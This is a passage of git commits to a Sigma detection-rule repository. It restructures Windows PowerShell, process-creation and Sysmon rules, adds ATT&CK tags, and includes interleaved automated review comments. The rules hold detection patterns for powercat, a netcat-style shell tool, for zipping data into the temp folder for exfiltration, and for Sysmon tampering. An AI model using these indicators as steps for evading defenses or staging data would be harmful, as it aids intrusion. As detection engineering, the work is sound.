rules/windows/sysmon/sysmon_config_modification_status.yml diff --git a/rules/windows/powershell/powershell_classic_powercat.yml b/rules/windows/powershell/powershell_classic_powercat.yml new file mode 100644 index 00000000..3ef28100 --- /dev/null +++ b/rules/windows/powershell/powershell_classic_powercat.yml 
@@ -0,0 +1,31 @@ +title: Netcat The Powershell Version +id: c5b20776-639a-49bf-94c7-84f912b91c15 +related: + - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 + type: derived +status: experimental +author: frack113 +date: 2021/07/21 +modified: 2021/09/07 +description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +references: + - https://nmap.org/ncat/ + - https://github.com/besimorhino/powercat + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md +tags: + - attack.command_and_control + - attack.t1095 +logsource: + product: windows + service: powershell-classic + definition: fields have to be extract from event +detection: + selection: + EventID: 400 + HostApplication|contains: + - 'powercat ' + - 'powercat.ps1' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml similarity index 56% rename from rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml rename to rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml index 6fdd897e..21bd9de4 100644 --- a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml 
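Review bot: `HostApplication` in the classic EventID 400 record carries the command line the PowerShell host was started with, so `HostApplication|contains: 'powercat '` presumably only fires when powercat is named on that start line and not when it is loaded inside an already running session; that scope is worth stating in `definition:`, which currently reads `fields have to be extract from event`. A clearer line would be `definition: Fields have to be extracted from the event message; HostApplication only reflects the command line the host was started with`.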
@@ -1,8 +1,12 @@ -action: global title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand +id: f65e22f9-819e-4f96-9c7b-498364ae7a25 +related: + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 + type: derived status: experimental author: frack113 date: 2021/07/13 +modified: 2021/09/07 description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md @@ -10,31 +14,6 @@ references: tags: - attack.defense_evasion - attack.t1218 -fields: - - ComputerName - - User - - CommandLine - - ParentCommandLine -falsepositives: - - Unknown -level: medium ---- -id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 -logsource: - product: windows - category: process_creation -detection: - selection_cmd: - CommandLine|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' - selection_opt: - CommandLine|contains: - - '-ModuleName ' - - '-ModulePath ' - - '-ScriptBlock ' - - '-RemoteFXvGPUDisablementFilePath' - condition: selection_cmd and selection_opt ---- -id: f65e22f9-819e-4f96-9c7b-498364ae7a25 logsource: product: windows service: powershell-classic @@ -49,18 +28,11 @@ detection: - '-ScriptBlock ' - '-RemoteFXvGPUDisablementFilePath' condition: selection_cmd and selection_opt ---- -id: 38a7625e-b2cb-485d-b83d-aff137d859f4 -logsource: - product: windows - service: powershell -detection: - selection_cmd: - ContextInfo|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' - selection_opt: - ContextInfo|contains: - - '-ModuleName ' - - '-ModulePath ' - - '-ScriptBlock ' - - '-RemoteFXvGPUDisablementFilePath' - condition: selection_cmd and selection_opt \ No newline at end of file +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium \ No newline at end of file 
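Review bot: The `fields:` block re-added at the end of the file lists `CommandLine` and `ParentCommandLine`, which are process_creation field names inherited from the former global rule; this file now targets `service: powershell-classic`, whose EventID 400 records presumably carry `HostApplication` rather than those fields, so the list should name the fields the rule actually matches on or be dropped. The same inherited list appears in the new `service: powershell` (EventID 4103, `ContextInfo`) rule created a few files further down. The head of this file's detection section lies between the second and third hunk and is outside the diff, so the matched field name is inferred from the sibling classic rules in this commit.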
diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/powershell/powershell_classic_susp_zip_compress.yml similarity index 54% rename from rules/windows/builtin/win_susp_zip_compress.yml rename to rules/windows/powershell/powershell_classic_susp_zip_compress.yml index 4f0ab147..70fa976b 100644 --- a/rules/windows/builtin/win_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_classic_susp_zip_compress.yml @@ -1,32 +1,18 @@ -action: global title: Zip A Folder With PowerShell For Staging In Temp +id: 71ff406e-b633-4989-96ec-bc49d825a412 +related: + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 + type: derived status: experimental author: frack113 date: 2021/07/20 +modified: 2021/09/07 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md tags: - attack.collection - attack.t1074.001 -falsepositives: - - Unknown -level: medium ---- -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 -logsource: - product: windows - category: process_creation -detection: - selection: - CommandLine|contains|all: - - 'Compress-Archive ' - - ' -Path ' - - ' -DestinationPath ' - - '$env:TEMP\' - condition: selection ---- -id: 71ff406e-b633-4989-96ec-bc49d825a412 logsource: product: windows service: powershell-classic @@ -39,16 +25,6 @@ detection: - ' -DestinationPath ' - '$env:TEMP\' condition: selection ---- -id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 -logsource: - product: windows - service: powershell -detection: - selection: - ContextInfo|contains|all: - - 'Compress-Archive ' - - ' -Path ' - - ' -DestinationPath ' - - '$env:TEMP\' - condition: selection \ No newline at end of file +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index bf10582d..f024c450 100644 
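Review bot: The retained detection requires the literal tokens ` -Path `, ` -DestinationPath ` and `$env:TEMP\` with `contains|all`, which pins the rule to the exact command line of the referenced T1074.001 atomic rather than to the technique; PowerShell also binds these parameters positionally, and the temporary directory has other spellings, so the `description` should say the rule covers that specific invocation and `level: medium` should be read in that light. The same literal list is used by the EventID 4103 and process_creation siblings created further down. The middle of this file lies between the two hunks and outside the diff, so the token list is taken from the context lines of the second hunk.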
--- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -1,8 +1,9 @@ -action: global title: Netcat The Powershell Version +id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: experimental author: frack113 date: 2021/07/21 +modified: 2021/09/07 description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ @@ -11,24 +12,6 @@ references: tags: - attack.command_and_control - attack.t1095 -falsepositives: - - Unknown -level: medium ---- -id: c5b20776-639a-49bf-94c7-84f912b91c15 -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - selection: - EventID: 400 - HostApplication|contains: - - 'powercat ' - - 'powercat.ps1' - condition: selection ---- -id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 logsource: product: windows service: powershell @@ -40,3 +23,6 @@ detection: - 'powercat ' - 'powercat.ps1' condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml new file mode 100644 index 00000000..214610d7 --- /dev/null +++ b/rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml 
@@ -0,0 +1,37 @@ +title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand +id: 38a7625e-b2cb-485d-b83d-aff137d859f4 +status: experimental +author: frack113 +date: 2021/07/13 +modified: 2021/09/07 +description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + service: powershell + definition: Module Logging must be enabled +detection: + selection_id: + EventID: 4103 + selection_cmd: + ContextInfo|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' + selection_opt: + ContextInfo|contains: + - '-ModuleName ' + - '-ModulePath ' + - '-ScriptBlock ' + - '-RemoteFXvGPUDisablementFilePath' + condition: selection_id and selection_cmd and selection_opt +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_susp_zip_compress.yml new file mode 100644 index 00000000..be6c466f --- /dev/null +++ b/rules/windows/powershell/powershell_susp_zip_compress.yml 
@@ -0,0 +1,28 @@
+title: Zip A Folder With PowerShell For Staging In Temp
+id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9
+status: experimental
+author: frack113
+date: 2021/07/20
+modified: 2021/09/07
+description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md
+tags:
+ - attack.collection
+ - attack.t1074.001
+logsource:
+ product: windows
+ service: powershell
+ definition: Module Logging must be enabled
+detection:
+ selection:
+ EventID: 4103
+ ContextInfo|contains|all:
+ - 'Compress-Archive '
+ - ' -Path '
+ - ' -DestinationPath '
+ - '$env:TEMP\'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml
new file mode 100644
index 00000000..073b04bb
--- /dev/null
+++ b/rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml
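Review bot: `ContextInfo|contains|all` on an EventID 4103 record presumably only matches when the whole `Compress-Archive ... $env:TEMP\` command appears in the context block's `Host Application` line, i.e. when it was passed on the host's command line; for a cmdlet run from a script or an interactive session the parameter values are written to the `Payload` data item (`ParameterBinding(Compress-Archive): name="DestinationPath"; value=...`), while `ContextInfo` carries `Command Name = Compress-Archive` without the arguments. Confirm against a sample event; if it holds, add a second selection over `Payload` with the same tokens and OR the two, and note the limitation in `definition:`. The same applies to the `ContextInfo|contains` option list of the Invoke-ATHRemoteFXvGPUDisablementCommand 4103 rule one file above.
```yaml
  selection:
    EventID: 4103
    ContextInfo|contains|all:
      # … unchanged: the four Compress-Archive tokens …
  selection_payload:
    EventID: 4103
    Payload|contains|all:
      - 'Compress-Archive '
      - ' -Path '
      - ' -DestinationPath '
      - '$env:TEMP\'
  condition: selection or selection_payload
```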
@@ -0,0 +1,37 @@ +title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand +id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 +related: + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 + type: derived +status: experimental +author: frack113 +date: 2021/07/13 +modified: 2021/09/07 +description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: process_creation +detection: + selection_cmd: + CommandLine|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' + selection_opt: + CommandLine|contains: + - '-ModuleName ' + - '-ModulePath ' + - '-ScriptBlock ' + - '-RemoteFXvGPUDisablementFilePath' + condition: selection_cmd and selection_opt +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_susp_zip_compress.yml b/rules/windows/process_creation/process_creation_susp_zip_compress.yml new file mode 100644 index 00000000..caf3e233 --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_zip_compress.yml 
@@ -0,0 +1,29 @@ +title: Zip A Folder With PowerShell For Staging In Temp +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +related: + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 + type: derived +status: experimental +author: frack113 +date: 2021/07/20 +modified: 2021/09/07 +description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md +tags: + - attack.collection + - attack.t1074.001 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification_error.yml similarity index 66% rename from rules/windows/sysmon/sysmon_config_modification.yml rename to rules/windows/sysmon/sysmon_config_modification_error.yml index 6ca045a7..c91e0d20 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification_error.yml 
@@ -1,32 +1,16 @@ -action: global -title: Sysmon Configuration Modification +title: Sysmon Configuration Error +id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 description: Someone try to hide from Sysmon status: experimental author: frack113 date: 2021/06/04 -modified: 2021/06/16 +modified: 2021/09/07 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html tags: - attack.defense_evasion - attack.t1564 -falsepositives: - - legitimate administrative action -level: high ---- -id: 1f2b5353-573f-4880-8e33-7d04dcf97744 -logsource: - product: windows - category: sysmon_status -detection: - selection_stop: - State: Stopped - selection_conf: - - 'Sysmon config state changed' - condition: selection_stop or selection_conf ---- -id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 logsource: product: windows category: sysmon_error @@ -36,3 +20,6 @@ detection: - 'Failed to open service configuration with error' - 'Failed to connect to the driver to update configuration' condition: selection_error +falsepositives: + - legitimate administrative action +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/sysmon_config_modification_status.yml b/rules/windows/sysmon/sysmon_config_modification_status.yml new file mode 100644 index 00000000..e2330610 --- /dev/null +++ b/rules/windows/sysmon/sysmon_config_modification_status.yml 
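Review bot: Both split rules keep `tags: - attack.t1564` while their references point at the T1562.001 atomic (`.../atomics/T1562.001/T1562.001.md`) and the description is about evading Sysmon; T1564 is Hide Artifacts and T1562.001 is Impair Defenses: Disable or Modify Tools, so the tag looks mismatched — confirm which is meant and align tag and reference here and in the new `sysmon_config_modification_status.yml` below. The description `Someone try to hide from Sysmon` is also too thin for a rule now titled `Sysmon Configuration Error`; `description: Detects Sysmon error events that indicate a failed attempt to change or reload the Sysmon configuration` says what the `sysmon_error` selection (context lines `Failed to open service configuration with error`, `Failed to connect to the driver to update configuration`) actually matches.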
@@ -0,0 +1,25 @@ +title: Sysmon Configuration Modification +id: 1f2b5353-573f-4880-8e33-7d04dcf97744 +description: Someone try to hide from Sysmon +status: experimental +author: frack113 +date: 2021/06/04 +modified: 2021/09/07 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md + - https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html +tags: + - attack.defense_evasion + - attack.t1564 +logsource: + product: windows + category: sysmon_status +detection: + selection_stop: + State: Stopped + selection_conf: + - 'Sysmon config state changed' + condition: selection_stop or selection_conf +falsepositives: + - legitimate administrative action +level: high From eef6e71e2ef222bb484602368a146412d9e62a30 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 7 Sep 2021 12:39:56 +0100 Subject: [PATCH 0770/1367] Update AWS Update Login Profile Rule fields Missed updating field from `responseElements.accessKey.userName` to `requestParameters.userName` on last update. --- rules/cloud/aws/aws_update_login_profile.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml index 6815fe2f..b4254d07 100644 --- a/rules/cloud/aws/aws_update_login_profile.yml +++ b/rules/cloud/aws/aws_update_login_profile.yml @@ -5,7 +5,7 @@ description: | An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users. author: toffeebr33k -date: 2021/08/09 +date: 2021/09/07 references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation logsource: 
@@ -19,7 +19,7 @@ detection: condition: selection_source and not filter fields: - userIdentity.arn - - responseElements.accessKey.userName + - requestParameters.userName - errorCode - errorMessage falsepositives: From 1a55f4a294656b868baa10e43a5e7f95bbefed44 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 14:37:03 +0200 Subject: [PATCH 0771/1367] filter: empty thumbprint, PetitPotam rule --- rules/windows/builtin/win_petitpotam_susp_tgt_request.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml index a576df1b..0ae4cb94 100644 --- a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml +++ b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml @@ -9,6 +9,7 @@ description: Detect suspicious Kerberos TGT requests. Once an attacer obtains a to the Domain Controller computer accounts. author: Mauricio Velazco, Michael Haag date: 2021/09/02 +modified: 2021/09/07 references: - https://github.com/topotam/PetitPotam - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ @@ -27,7 +28,9 @@ detection: CertThumbprint: '*' filter_local: IpAddress: '::1' - condition: selection and not filter_local + filter_thumbprint: + CertThumbprint: '' + condition: selection and not filter_local and not filter_thumbprint falsepositives: - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts. level: high From be5351947c3c09db92cb2d5b1ad59ae0e03e3361 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 7 Sep 2021 16:36:59 +0100 Subject: [PATCH 0772/1367] Unset date update Signed-off-by: Rachel Rice --- rules/cloud/aws/aws_update_login_profile.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
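Review bot: `filter_thumbprint: CertThumbprint: ''` relies on the backend turning an empty-string value into "field present but empty", which is not uniform across Sigma backends, and in Kerberos TGT request events a missing certificate tends to surface as an absent field, which the specification expresses with `null` rather than `''`. Since `selection` already requires `CertThumbprint: '*'` (any value), it is worth checking the converted query for each target backend to see whether the new filter excludes anything that the `'*'` match lets through, or whether a single non-empty match in `selection` (for example a `CertThumbprint|re` pattern requiring at least one character) is what was intended. The `selection` block begins outside the hunk.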
diff --git a/rules/cloud/aws/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml index b4254d07..d8468d6d 100644 --- a/rules/cloud/aws/aws_update_login_profile.yml +++ b/rules/cloud/aws/aws_update_login_profile.yml @@ -5,7 +5,7 @@ description: | An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users. author: toffeebr33k -date: 2021/09/07 +date: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation logsource: From 4e394d83a1a18a8c291e73bafa881b21134b90a7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 7 Sep 2021 17:45:41 +0200 Subject: [PATCH 0773/1367] add missing tags --- rules/windows/process_creation/win_apt_mustangpanda.yml | 3 +++ .../win_exchange_proxylogon_oabvirtualdir.yml | 5 ++++- rules/windows/process_creation/win_malware_conti.yml | 3 +++ .../windows/process_creation/win_purplesharp_indicators.yml | 3 +++ rules/windows/process_creation/win_susp_codepage_switch.yml | 3 +++ .../process_creation/win_susp_regedit_trustedinstaller.yml | 3 +++ .../process_creation/win_vul_java_remote_debugging.yml | 3 +++ 7 files changed, 22 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_apt_mustangpanda.yml b/rules/windows/process_creation/win_apt_mustangpanda.yml index 61474510..2ed3d867 100644 --- a/rules/windows/process_creation/win_apt_mustangpanda.yml +++ b/rules/windows/process_creation/win_apt_mustangpanda.yml @@ -32,3 +32,6 @@ fields: falsepositives: - Unlikely level: high +tags: + - attack.t1587.001 + - attack.resource_development \ No newline at end of file 
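Review bot: `attack.t1587.001` and `attack.resource_development` added to `win_apt_mustangpanda.yml` describe the adversary developing malware before the intrusion, which a process_creation rule on the victim host cannot observe; the same pair is added in the `win_exchange_proxylogon_oabvirtualdir.yml` and `win_malware_conti.yml` hunks that follow, and `attack.t1587` in `win_purplesharp_indicators.yml`. ATT&CK tags on a detection rule normally name the behaviour the telemetry shows (execution or defense evasion for these; for the ProxyLogon rule something like `attack.t1505.003` with `attack.initial_access` would presumably fit better), so they should be re-derived from each rule's detection logic rather than from the actor's profile. As a point of style, the `tags:` blocks are appended after `level:` whereas the rest of the repository places `tags` after `references`, and several files now end without a trailing newline, which every later diff will flag with `\ No newline at end of file`.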
diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml index 96e0ed82..138d45dc 100644 --- a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml @@ -21,4 +21,7 @@ detection: condition: all of selection_cmdlet and selection_params falsepositives: - Unlikely -level: critical \ No newline at end of file +level: critical +tags: + - attack.t1587.001 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml index c529a3ba..1c7671a1 100644 --- a/rules/windows/process_creation/win_malware_conti.yml +++ b/rules/windows/process_creation/win_malware_conti.yml @@ -23,3 +23,6 @@ fields: falsepositives: - Unknown level: high +tags: + - attack.t1587.001 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_purplesharp_indicators.yml b/rules/windows/process_creation/win_purplesharp_indicators.yml index 29ae7a7a..1d0969a5 100644 --- a/rules/windows/process_creation/win_purplesharp_indicators.yml +++ b/rules/windows/process_creation/win_purplesharp_indicators.yml @@ -22,3 +22,6 @@ detection: falsepositives: - Unlikely level: critical +tags: + - attack.t1587 + - attack.resource_development \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_codepage_switch.yml b/rules/windows/process_creation/win_susp_codepage_switch.yml index 09f0a787..a6d0a6c2 100644 --- a/rules/windows/process_creation/win_susp_codepage_switch.yml +++ b/rules/windows/process_creation/win_susp_codepage_switch.yml 
@@ -27,3 +27,6 @@ fields: falsepositives: - "Administrative activity (adjust code pages according to your organisation's region)" level: medium +tags: + - attack.t1036 + - attack.defense_evasion \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml b/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml index f6dc1360..4861f0dc 100644 --- a/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml +++ b/rules/windows/process_creation/win_susp_regedit_trustedinstaller.yml @@ -18,3 +18,6 @@ detection: falsepositives: - Unlikely level: high +tags: + - attack.privilege_escalation + - attack.t1548 \ No newline at end of file diff --git a/rules/windows/process_creation/win_vul_java_remote_debugging.yml b/rules/windows/process_creation/win_vul_java_remote_debugging.yml index 06b658f9..03448ef3 100644 --- a/rules/windows/process_creation/win_vul_java_remote_debugging.yml +++ b/rules/windows/process_creation/win_vul_java_remote_debugging.yml @@ -20,3 +20,6 @@ fields: falsepositives: - unknown level: medium +tags: + - attack.t1203 + - attack.execution \ No newline at end of file From 4c3f8821c4163782d4395a188ae2b3278d7ecb6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:16:46 +0200 Subject: [PATCH 0774/1367] add missing tags --- rules/linux/auditd/lnx_auditd_susp_exe_folders.yml | 6 ++++-- rules/linux/lnx_buffer_overflows.yml | 3 +++ rules/linux/lnx_clamav.yml | 3 +++ rules/linux/lnx_ldso_preload_injection.yml | 4 ++++ rules/linux/lnx_shell_susp_log_entries.yml | 2 ++ rules/linux/lnx_shellshock.yml | 3 +++ rules/linux/lnx_ssh_cve_2018_15473.yml | 3 +++ rules/linux/lnx_susp_failed_logons_single_source.yml | 3 +++ rules/linux/lnx_susp_guacamole.yml | 4 +++- rules/linux/lnx_symlink_etc_passwd.yml | 3 +++ rules/linux/modsecurity/modsec_mulitple_blocks.yml | 3 +++ 11 files changed, 34 insertions(+), 3 deletions(-) 
diff --git a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml index 4cbc91f8..be388984 100644 --- a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml +++ b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml @@ -37,5 +37,7 @@ falsepositives: - Admin activity (especially in /tmp folders) - Crazy web applications level: medium - - +tags: + - attack.t1587 + - attack.t1584 + - attack.resource_development \ No newline at end of file diff --git a/rules/linux/lnx_buffer_overflows.yml b/rules/linux/lnx_buffer_overflows.yml index 7a446e14..fdce5281 100644 --- a/rules/linux/lnx_buffer_overflows.yml +++ b/rules/linux/lnx_buffer_overflows.yml @@ -18,3 +18,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.t1068 + - attack.privilege_escalation \ No newline at end of file diff --git a/rules/linux/lnx_clamav.yml b/rules/linux/lnx_clamav.yml index cd19a25a..852d2dee 100644 --- a/rules/linux/lnx_clamav.yml +++ b/rules/linux/lnx_clamav.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.resource_development + - attack.t1588.001 \ No newline at end of file diff --git a/rules/linux/lnx_ldso_preload_injection.yml b/rules/linux/lnx_ldso_preload_injection.yml index be1b937b..8f1d0c9c 100644 --- a/rules/linux/lnx_ldso_preload_injection.yml +++ b/rules/linux/lnx_ldso_preload_injection.yml @@ -15,3 +15,7 @@ detection: falsepositives: - rare temporary workaround for library misconfiguration level: high +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1574.006 \ No newline at end of file diff --git a/rules/linux/lnx_shell_susp_log_entries.yml b/rules/linux/lnx_shell_susp_log_entries.yml index 55756eff..053bd8e4 100644 --- a/rules/linux/lnx_shell_susp_log_entries.yml +++ b/rules/linux/lnx_shell_susp_log_entries.yml @@ -16,3 +16,5 @@ detection: falsepositives: - Unknown level: medium +tags: + - attack.impact \ No newline at end of file 
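Review bot: `attack.t1587`, `attack.t1584` and `attack.resource_development` on `lnx_auditd_susp_exe_folders.yml` are pre-compromise Resource Development techniques (developing capabilities, compromising infrastructure) that an auditd execution rule on the victim cannot evidence; `attack.t1588.001` on `lnx_clamav.yml` in the same line has the same problem, and `attack.t1204.001` (User Execution: Malicious Link) on `lnx_symlink_etc_passwd.yml` and `attack.persistence`/`attack.t1505.003` on `lnx_shellshock.yml` in the next line look mismatched to what those rules match. `lnx_shell_susp_log_entries.yml` receives only the tactic `attack.impact` with no technique. As with the previous commit, the tags should be derived from each rule's detection block (execution for the exe-folder rule, an exploitation technique such as `attack.t1190` for Shellshock) and checked against the ATT&CK IDs before merging.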
diff --git a/rules/linux/lnx_shellshock.yml b/rules/linux/lnx_shellshock.yml index ba7fc1bb..f842b16e 100644 --- a/rules/linux/lnx_shellshock.yml +++ b/rules/linux/lnx_shellshock.yml @@ -19,3 +19,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.persistence + - attack.t1505.003 \ No newline at end of file diff --git a/rules/linux/lnx_ssh_cve_2018_15473.yml b/rules/linux/lnx_ssh_cve_2018_15473.yml index a88aa671..d7bb5c46 100644 --- a/rules/linux/lnx_ssh_cve_2018_15473.yml +++ b/rules/linux/lnx_ssh_cve_2018_15473.yml @@ -16,3 +16,6 @@ detection: falsepositives: - Unknown level: medium +tags: + - attack.reconnaissance + - attack.t1589 \ No newline at end of file diff --git a/rules/linux/lnx_susp_failed_logons_single_source.yml b/rules/linux/lnx_susp_failed_logons_single_source.yml index 1d7f4c45..b87fe723 100644 --- a/rules/linux/lnx_susp_failed_logons_single_source.yml +++ b/rules/linux/lnx_susp_failed_logons_single_source.yml @@ -19,3 +19,6 @@ falsepositives: - Jump servers - Workstations with frequently changing users level: medium +tags: + - attack.credential_access + - attack.t1110 \ No newline at end of file diff --git a/rules/linux/lnx_susp_guacamole.yml b/rules/linux/lnx_susp_guacamole.yml index 3e6b7759..a19ec04d 100644 --- a/rules/linux/lnx_susp_guacamole.yml +++ b/rules/linux/lnx_susp_guacamole.yml @@ -16,4 +16,6 @@ detection: falsepositives: - Unknown level: high - +tags: + - attack.credential_access + - attack.t1212 diff --git a/rules/linux/lnx_symlink_etc_passwd.yml b/rules/linux/lnx_symlink_etc_passwd.yml index 9d20a189..043a45b0 100644 --- a/rules/linux/lnx_symlink_etc_passwd.yml +++ b/rules/linux/lnx_symlink_etc_passwd.yml @@ -16,3 +16,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.t1204.001 + - 